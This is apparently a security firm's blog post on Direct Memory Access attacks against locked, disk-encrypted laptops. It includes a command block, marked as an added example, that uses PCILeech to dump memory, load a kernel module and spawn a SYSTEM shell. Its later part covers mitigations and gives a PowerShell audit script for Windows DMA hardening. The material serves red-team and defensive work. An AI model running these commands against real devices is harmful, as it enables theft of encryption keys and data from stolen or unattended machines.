Have you ever come across a laptop, server or desktop computer that uses Full Disk Encryption (FDE) and is protected by a password/logon screen, and wondered how an attacker could get into it? Direct Memory Access (DMA) attacks can bypass both of these security measures, given a few preconditions.
In this blog post we explore how an attacker can use DMA attacks to gain full control of a computer system, and discuss what you and your organisation can do to prevent them.
Direct Memory Access is a legitimate feature of computer systems that allows certain hardware subsystems to read and write main system memory independently of the central processing unit (CPU), so that bulk data can be moved at high speed without the CPU copying every byte. Numerous hardware devices use DMA, including disk drive controllers, graphics cards, network cards and sound cards.
These devices connect to the computer via several DMA-capable interconnects such as PCI Express, PCI, Thunderbolt, USB4, FireWire, ExpressCard and CardBus. These interconnects let a device transfer data to and from the computer at the maximum speed possible by giving it direct read and write access to main memory, without the Operating System (OS) inspecting each transfer. Unless an IOMMU (Intel VT-d or AMD-Vi) is enabled and the OS uses it to confine each device to the memory ranges it has been granted, a DMA-capable device can read or write any physical address.
All modern laptops, servers and desktops have at least one DMA-capable connection such as Thunderbolt or PCI Express. These common connections give an attacker an opportunity to bypass OS security mechanisms such as the Windows logon/lock screen and to read and write the entire physical address space. FDE does not help here: it protects data at rest, but while the system is running, the OS, its data and the disk encryption keys are held unencrypted in RAM. This allows an attacker to steal secrets such as cryptographic keys and to install malware such as keyloggers and backdoors.
There are several scenarios in which an attacker can attempt a DMA attack: gaining access to a stolen device such as a laptop; a DMA "drive-by" attack, where the attacker quickly plugs a DMA attack device into a PCI Express slot or Thunderbolt port while the device is unattended; or sending the victim a rogue DMA device disguised as an everyday peripheral as part of a social engineering attack.
At SureCloud, one of the scenarios we like to test as part of a Red Team engagement is what happens if a client's device, such as a laptop, is stolen by an attacker, and what they can do with it. Most organisations now implement Full Disk Encryption, via BitLocker for example, and protect the device with an OS logon screen such as the Windows logon screen, which prompts for the user's password when a Windows device starts up. At the time of writing there are no publicly known software-only bypasses of these security mechanisms, and this is where DMA attacks become useful to attackers, as they allow these measures to be bypassed with the help of a specialised DMA device such as the Screamer PCIe Squirrel, LeetDMA, Enigma-x1 or USB3380-EVB, to name a few. These devices can easily be purchased online and are commonly used for other purposes such as game hacking and kernel debugging.

The DMA device is plugged into the stolen laptop either via a PCI Express-capable slot, such as an M.2 slot, or via a Thunderbolt port. It should be noted that for this attack to work a few security features in the BIOS/UEFI firmware need to be off (for example the IOMMU that backs Kernel DMA Protection); these are sometimes off by default, or can be switched off by an attacker if there is no BIOS password. Thus, if your organisation or your personal device does not have a BIOS password, we highly recommend setting one to prevent an attacker from switching off the security features that help protect against attacks such as DMA attacks.
Figure 1: DMA Attack Devices
Another important part of a DMA attack is the software that makes it easy to execute. The most popular DMA attack tool is PCILeech, created by Ulf Frisk, which drives the DMA hardware device to read and write the target system's memory, giving easy access to live memory and to the target's file system via a mounted drive. PCILeech can also remove the OS logon password requirement, load unsigned drivers, execute code and spawn system shells. Its currently supported targets are the x64 versions of UEFI, Linux, FreeBSD and Windows.
Here are some of the features that PCILeech is capable of:
Source: https://github.com/ufrisk/pcileech
As you can see, these features are a treasure trove for an attacker, allowing some very powerful operations that bypass security controls on the most popular operating systems, including Linux and Windows. The next section demonstrates some of these attacks.
The target device is a modern Windows 10 laptop that is password protected and has no BIOS password. The DMA device (a Screamer PCIe Squirrel) was connected to a free M.2 slot on the laptop's motherboard using an M.2 to PCI Express x4 extension cable. The attacker then connects a USB Type-C cable from the DMA device to their own laptop, which runs the PCILeech software, and can execute commands such as:
Figure 2: DMA attack against a laptop using the Screamer PCIe Squirrel DMA device and PCILeech to spawn a cmd.exe shell as NT AUTHORITY\SYSTEM.
Figure 3: PCILeech used to load code into the kernel of the Windows 10 laptop and spawn a cmd.exe shell as NT AUTHORITY\SYSTEM.
Figure 4: Mounting the target system's memory using PCILeech and browsing its contents in File Explorer.
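The commands behind figures 2 to 4, as an added example that is not part of the original post: these are PCILeech's own command names (probe, dump, kmdload, wx64_pscmd and mount, as documented in the PCILeech README), typed on the attacker's laptop with the Screamer PCIe Squirrel attached over USB-C. The kernel module address 0x7fffe000 is a placeholder (PCILeech prints the real one when kmdload succeeds), and the exact switches should be checked against the installed PCILeech version.

```powershell
# Added example, not from the original post: the PCILeech workflow shown in
# figures 2-4, run on the attacker's laptop. Assumes the FPGA device (Screamer
# PCIe Squirrel) is connected over USB-C and pcileech.exe plus its driver from
# https://github.com/ufrisk/pcileech are installed in the current directory.

# 0. Probe the target's physical memory. Pages that cannot be read (for example
#    because an IOMMU / Kernel DMA Protection confines the device) show up as
#    unreadable here, so this is also the quickest way to tell whether the
#    attack will work at all on this target.
.\pcileech.exe probe -device fpga

# 1. Dump all physical memory to a file for offline analysis (disk encryption
#    keys, cached credentials and hashes live in RAM while the machine is on).
.\pcileech.exe dump -device fpga -out target_ram.bin

# 2. Load the PCILeech kernel module into the running Windows 10 x64 kernel
#    (figure 3). WIN10_X64_3 is the kernel module variant for current Windows 10
#    x64 builds; on success PCILeech prints the kernel module (KMD) address.
.\pcileech.exe kmdload -device fpga -kmd WIN10_X64_3

# 3. With the kernel module loaded, spawn cmd.exe as NT AUTHORITY\SYSTEM on the
#    locked laptop (figure 2). Replace the placeholder address below with the
#    KMD address printed in step 2.
.\pcileech.exe wx64_pscmd -device fpga -kmd 0x7fffe000

# 4. Mount the target's live memory and file system as a drive letter on the
#    attacker's machine (figure 4). Requires Dokany to be installed.
.\pcileech.exe mount -device fpga -kmd 0x7fffe000
```

Step 0 is worth running first during a Red Team engagement: on a laptop with Kernel DMA Protection active, the probe either fails to find readable memory or is blocked outright, which tells you the defences discussed in the next section are in place without having to attempt the kernel module load.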
To prevent DMA attacks, the first and most obvious control is physical security: preventing unauthorised access to a device and its slots/ports prevents this type of attack, as physical access is required. If the device is used in public spaces, cannot be securely stored away, or is stolen, the following settings are crucial to prevent DMA attacks.
It is recommended that as many of these settings as possible be enabled, as there is no single control that protects against DMA attacks on its own. DMA attacks are just one type of physical attack; there are many more that an organisation needs to be aware of, such as malicious USB devices, attacks that target the BIOS/UEFI firmware and attacks against the TPM.
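To check whether a Windows 10/11 device actually has the DMA-related settings from the Microsoft references above in place, here is an added audit script (example code written for this post, not from SureCloud's toolset or from Microsoft). It assumes English-language Windows, an elevated PowerShell prompt, the Get-BitLockerVolume cmdlet, and the registry locations that the BitLocker "Disable new DMA devices when this computer is locked" policy and the DmaGuard DeviceEnumerationPolicy CSP write to; the Kernel DMA Protection status is read by exporting an msinfo32 report, since that is where Microsoft documents it.

```powershell
# Added example, not from the original post: audit a Windows device for the
# DMA-related hardening settings referenced above. Run from an elevated prompt.
# Assumptions: English locale (msinfo32 labels), Windows 10 1803+ for Kernel
# DMA Protection, and the policy registry paths as documented for the
# BitLocker and DmaGuard group policies / Policy CSP.

function Get-PolicyValue {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }   # key or value absent = policy not configured
}

function Test-DmaHardening {
    $findings = @()

    # 1. BitLocker protector type. A TPM-only protector releases the volume key
    #    at boot with no user interaction, so the key is already in RAM when the
    #    attacker plugs in at the lock screen. TPM + PIN keeps it out of memory
    #    until the user authenticates pre-boot.
    $os = Get-BitLockerVolume -MountPoint $env:SystemDrive
    $types = @($os.KeyProtector.KeyProtectorType)
    if ($os.ProtectionStatus -ne 'On') {
        $findings += 'BitLocker protection is OFF on the OS volume'
    } elseif ($types -notcontains 'TpmPin' -and $types -notcontains 'TpmPinStartupKey') {
        $findings += "BitLocker protectors [$($types -join ', ')] have no pre-boot PIN"
    }

    # 2. "Disable new DMA devices when this computer is locked" (BitLocker GPO).
    $underLock = Get-PolicyValue 'HKLM:\SOFTWARE\Policies\Microsoft\FVE' 'DisableExternalDMAUnderLock'
    if ($underLock -ne 1) {
        $findings += 'New DMA devices are not blocked while locked (DisableExternalDMAUnderLock != 1)'
    }

    # 3. DmaGuard/DeviceEnumerationPolicy for devices that are not compatible with
    #    DMA remapping: 0 = block all, 1 = only after logon/unlock (Windows default
    #    when unconfigured), 2 = allow all. 0 is the hardened choice.
    $enum = Get-PolicyValue 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Kernel DMA Protection' 'DeviceEnumerationPolicy'
    if ($null -eq $enum) {
        $findings += 'DmaGuard DeviceEnumerationPolicy not configured (defaults to 1: allow after unlock)'
    } elseif ($enum -eq 2) {
        $findings += 'DmaGuard DeviceEnumerationPolicy = 2 (all DMA devices allowed, insecure)'
    }

    # 4. Kernel DMA Protection itself (needs the IOMMU enabled in firmware and a
    #    supported platform). msinfo32 reports it as "Kernel DMA Protection  On/Off".
    $report = Join-Path $env:TEMP 'msinfo32_dma_audit.txt'
    Start-Process -FilePath msinfo32.exe -ArgumentList "/report `"$report`"" -Wait
    $line = Select-String -Path $report -Pattern '^Kernel DMA Protection' | Select-Object -First 1
    if (-not $line -or $line.Line -notmatch 'On\s*$') {
        $findings += 'Kernel DMA Protection is OFF or unsupported (enable VT-d/AMD-Vi in firmware, set a firmware password)'
    }
    Remove-Item $report -ErrorAction SilentlyContinue

    return $findings
}

$result = Test-DmaHardening
if ($result.Count -eq 0) {
    Write-Host 'No DMA hardening findings.'
} else {
    $result | ForEach-Object { Write-Host "[!] $_" }
}
```

The script reports gaps rather than fixing them, because the fixes belong in firmware (IOMMU on, firmware password set) and in group policy or MDM, not in an ad hoc script. Note that a finding from step 4 on a pre-2018 laptop usually means the platform cannot support Kernel DMA Protection at all; on such devices the BitLocker pre-boot PIN and the "disable new DMA devices when locked" policy are the controls that remain.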
[1] - Wikipedia - Direct memory access
[3] - MITRE ATT&CK - Hardware Additions
[5] - GitHub - PCILeech Repository
[6] - Direct memory access protections for Mac computers
[7] - Linux hardening against DMA attacks
[8] - Microsoft - BitLocker countermeasures
[9] - Microsoft - Kernel DMA Protection
[10] - Microsoft - Kernel DMA Protection (Memory Access Protection) for OEMs
[11] - Microsoft - Policy CSP : DmaGuard
[12] - DEF CON 24 - Ulf Frisk - Direct Memory Attack the Kernel